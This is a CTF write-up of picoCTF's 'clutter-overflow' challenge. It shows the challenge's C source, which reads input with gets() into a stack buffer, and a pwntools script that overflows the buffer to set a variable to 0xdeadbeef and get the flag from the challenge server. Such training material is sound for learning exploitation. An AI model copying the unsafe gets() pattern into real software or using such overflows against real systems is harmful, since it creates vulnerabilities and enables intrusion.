Binary Exploitation
{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890
​chall.c chall​

Recon

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>
​
#define SIZE 0x100
#define GOAL 0xdeadbeef
​
int main(void)
{
long code = 0;
char clutter[SIZE];
​
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
​
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
​
gets(clutter);
​
​
if (code == GOAL) {
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
​
return 0;
}

Solution

Overwrite the code variable with 0xdeadbeef.

Exploit

#!/usr/bin/env python3
from pwn import *
​
#--------Setup--------#
​
context(arch='amd64', os='linux')
elf = ELF("./chall", checksec=False)
​
host = 'mars.picoctf.net'
port = 31890
​
#--------Overwrite variable--------#
​
offset = 0x110 - 0x8
​
payload = flat(
b"A" * offset,
0xdeadbeef,
)
​
r = remote(host, port)
​
r.sendlineafter('What do you see?\n', payload)
​
r.interactive()
Copy link
Outline
clutter-overflow
Challenge
Recon
Source Code
Solution
Exploit